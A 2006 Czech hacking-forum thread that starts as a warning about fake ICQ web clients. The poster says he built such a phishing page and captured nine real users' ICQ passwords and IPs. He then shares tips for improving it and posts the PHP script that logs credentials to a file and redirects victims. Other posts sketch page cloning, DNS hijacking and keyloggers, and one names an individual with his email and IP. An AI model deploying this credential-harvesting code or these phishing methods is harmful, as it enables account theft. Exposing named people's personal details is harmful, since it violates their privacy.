Nedelejte ze sebe voly

HackForum

Nedelejte ze sebe voly#
Pokud dostanete zpravu typu: "Ahoj, vyzkousej meho super web icq clienta na adrese [link]" , tak nedelejte to, ze prvni co bude zadate sve UIN (icq cislo) a Pass, to neplati jen pro ICQ, ale pro vic veci ...
Naucte se byt paranoidni, osobne jsem behem 20 minutek sepsal toto (v konqueroru fuj) [link] vypada to jak nejaky web client, ale nedela to nic jineho, nez ulozi UIN a heslo s IP adresou ... Najivne sem si myslel, ze se nachyta max 2-3 lidi, ale je hodina od zverejneni a uz mam UIN,PASS a IP 9 lidi. Ne zdaleka vsichni jeste mou zpravu cetli ... tato metoda je velmi snadna (easy-1 az 10-hard) uroven:0 :-D a taky jde velmi jednoduse zjistit ... pokud chcete byt na strane utocnika, doporucuji pohrat si s designem cele stranky a udelat tomu "hejblatka" myslim udeljte to treba ve flashy, ale proboha hlavne sami nenalette ...
Plati pravidlo, kazdej chytrej clovek nezadava sve osobni udaje (UIN + pass, email + pass, etc.) na netu, kde nema overene to co se s nema stane ...
(odpovědět)
Tecquilka | E-mail | ICQ 22885801217.1.2006 21:55
re: Nedelejte ze sebe voly#
ps jak uz bylo receno a ceho si vsiml i freez, v opere neni pozicovani idealni, ale presto to funguje ... toto je nejednodussi zpusob, zjistite tak heslo pro lidi kteri nepremysli ...
(odpovědět)
Tecquilka | E-mail | ICQ 22885801218.1.2006 13:02
re: Nedelejte ze sebe voly#
nevim, jestli je to nektery z lidi, co chodi sem, ale jisty Mirek Petricek <mirek@petricek.cz> si muze sve nevhodne komentare strcit do ... za klobouk ...
(500300-jsesdebil) -IP:62.177.100.9
(odpovědět)
Tecquilka | E-mail | ICQ 22885801218.1.2006 13:06
re: Nedelejte ze sebe voly#
[link]

toto je mireček...
(odpovědět)
Pat3jl18.1.2006 15:19
re: Nedelejte ze sebe voly#
Diky :-) nasel jsem si jej ale sam :-) pan google je dobra potvurka, ale ten clovek, se kterym jsem mluvil neni ten typ, ktery by se choval takto ... no rekneme detinsky ... Take se zminoval ze tato IP neni jeho, takze nevim ... v kazdym pripade se s ono IP setkal a psal z ni email ... neco s linama a iptables, ale jelikoz jsem byl zaneprazdnen (kecam, chtel jsem si dat pauzu, tak sem se dival na film) jsem dalsi info nezjistoval
(odpovědět)
tecquilkaa18.1.2006 18:49
re: Nedelejte ze sebe voly#
ma blbost, nedival jsem se do whois databaze :-( je to podle jeho vyjadreni dynamicka IP ... dokonce poslal vypis z databaze, takze, pokud sem dojde se mu verejne omlouvam
(odpovědět)
tecquilkaa18.1.2006 18:50
re: Nedelejte ze sebe voly#
no me se libilo jak tady nekdo psal fakestranku co naincluduje zdrojak nejakyho webu (treba seznamu), upravi adresu prihlasovaciho formu na email, peclive si vse zaznamena a presmeruje na do skutecny stranky. i na to skocit je volovina, ale musim rict ze je to uz velmi ucinny. tuplem s ie-spoofingem ;-]
(odpovědět)
dayvee | Website | ICQ 26899873318.1.2006 17:35
re: Nedelejte ze sebe voly#
dalsi funknci zpusob by byl na iskani heslo podobnou metodou ... vytvorite kopii stranky seznamu ... zjistite si DNS obeti a donutite zmenit zaznam na treba seznam.cz, kterej bude odpovdidat vasim strankam ...
Teorie je easy, v praxy by to bylo mnohem tezsi ... lepsi by bylo zmenit jeho DNS na nas pc, kde vedem dns server ... a upravit zaznamy ..., ale ted jiste kzadeho napadne proc menit dns server na jeho pc, kdyz uz rovnou muzu s timto pristupem naistalovat keylogger :-)
(odpovědět)
tecquilkaa19.1.2006 10:42
re: Nedelejte ze sebe voly#
co jste tedy vyresili ?
(odpovědět)
bUgs19.1.2006 11:51
re: Nedelejte ze sebe voly#
Ze nekteri lidi zbystrili sve smysly (jsou trosku vic paranoidni) ... Chtel jsem to jen zminit, jako clanek by to nemelo nekterou infromativni hodnotu, proto jsem to hodil sem ..
(odpovědět)
tecquilkaa20.1.2006 12:32
re: Nedelejte ze sebe voly#
nekdo tady psal ze je lepsi byt paranoidni prece
(odpovědět)
bUgs20.1.2006 12:49
re: Nedelejte ze sebe voly#
tecquilkaa neposles mi prosimta zdrojak z formularu a suboru na spracovanie toho fake pripojenia na ICQ ? truehack@post.sk diki....inac pekne spracovany design:)
(odpovědět)
truehack22.1.2006 1:11
re: Nedelejte ze sebe voly#
nactu hodnoty z promennych, otevru si soubor a parametrem "a" pridavam ... pak uz se jen podivam na log. jo jeste zjistim IP
<code>
<?
$soubor = fopen("pass.txt","a");
$ip = $REMOTE_ADDR;
$pomocna = "(".$text."-".$password.") -IP:".$ip."\n";
fwrite($soubor, $pomocna);
fclose($soubor);
header('Location: [link]');
?>
</code>
(odpovědět)
tecquilkaa22.1.2006 18:42
re: Nedelejte ze sebe voly#
ach jo :-( Emkei, plz muzes nekam hodit jak mas nastavene prikazy ?? jako <cite> apod ? thx poc :-)
to <code> tam byt samo nema ...
(odpovědět)
tecquilkaa22.1.2006 18:44
re: Nedelejte ze sebe voly#
Na to mam jednoduchou odpoved, tagy se vykonavaji vyhradne v sekcich Clanky, Recenze a UserTexts, vsude jinde (Diskuze, WebForum, komentare a jine uziv. vstupy) dojde k jejich vypsani automaticky bez vykonavani, takze se nemusis zatezovat s jejich uvozovanim nebo nahrazovanim za entity.
(odpovědět)
Emkei | E-mail | Website | PGP23.1.2006 16:54
re: Nedelejte ze sebe voly#
kk thx za odpoved emkei :-)
(odpovědět)
tecquilkaa24.1.2006 8:52

Zpět
 
 
 

 
BBCode